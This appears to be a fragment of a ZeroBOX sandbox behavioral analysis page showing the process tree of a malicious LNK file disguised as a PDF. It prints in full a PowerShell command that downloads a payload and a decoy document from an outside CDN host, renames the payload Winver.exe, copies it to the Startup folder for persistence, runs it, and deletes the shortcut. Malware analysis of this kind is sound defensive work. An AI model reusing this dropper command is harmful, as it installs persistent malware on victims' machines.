| ZeroBOX

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IZFDLWw" C:\Users\test22\AppData\Local\Temp\Cabinet.pdf.lnk
2560
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';wget "https://kdrm201.b-cdn.net/xnt" -OutFile C:\Users\Public\Cab.pdf;Start-Process C:\Users\Public\Cab.pdf;$ProgressPreference = 'SilentlyContinue';wget "https://kdrm201.b-cdn.net/r" -OutFile "C:\ProgramData\p";move "C:\ProgramData\p" "C:\ProgramData\Winver.exe";wget "https://kdrm201.b-cdn.net/xnt" -OutFile C:\Users\Public\Cabinet.pdf;$pqr = Get-ChildItem -Path Env:APPDATA;$xyz = '\Microsoft\Windows\\"Start Menu"\Programs\Startup';$abc = $pqr.value+$xyz;Copy-Item C:\ProgramData\Winver.exe -Destination $abc;Start-Process C:\ProgramData\Winver.exe;cp -Path 'C:\Users\Public\Cabinet.pdf' -destination $pwd.Path;rm *f.l?k;
  2672

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis